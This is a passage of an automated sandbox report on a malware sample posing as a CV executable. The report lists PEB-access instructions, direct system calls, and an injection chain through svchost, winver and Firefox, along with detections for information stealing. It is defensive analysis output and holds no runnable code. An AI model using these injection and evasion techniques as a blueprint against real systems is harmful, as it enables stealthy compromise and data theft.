                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]2_2_034649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]2_2_034FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]2_2_034BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A830 mov eax, dword ptr fs:[00000030h]2_2_0346A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]2_2_034D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]2_2_034D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E8C0 mov eax, dword ptr fs:[00000030h]2_2_0345E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA8E4 mov eax, dword ptr fs:[00000030h]2_2_034FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]2_2_0346C8F9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_000FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_000E8189 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_000E81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: NULL target: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe protection: read write
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: NULL target: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\winver.exe | Thread register set: target process: 3924
                Source: C:\Windows\SysWOW64\winver.exe | Thread APC queued: target process: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 29FD008
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_000FB106 LogonUserW
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_000C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_0010411C SendInput,keybd_event
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_001074BB mouse_event
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe | Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_000FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_001071FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: NObNfBLfyhvzeH.exe, 00000004.00000002.4525620614.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000000.2312644654.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4525672303.0000000001001000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: CV Lic H&S Olivetti Renzo.exe, NObNfBLfyhvzeH.exe, 00000004.00000002.4525620614.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000000.2312644654.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4525672303.0000000001001000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: NObNfBLfyhvzeH.exe, 00000004.00000002.4525620614.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000000.2312644654.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4525672303.0000000001001000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: CV Lic H&S Olivetti Renzo.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: NObNfBLfyhvzeH.exe, 00000004.00000002.4525620614.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000000.2312644654.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4525672303.0000000001001000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_000E65C4 cpuid
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_0011091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_0013B340 GetUserNameW
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_000F1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe | Code function: 0_2_000DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
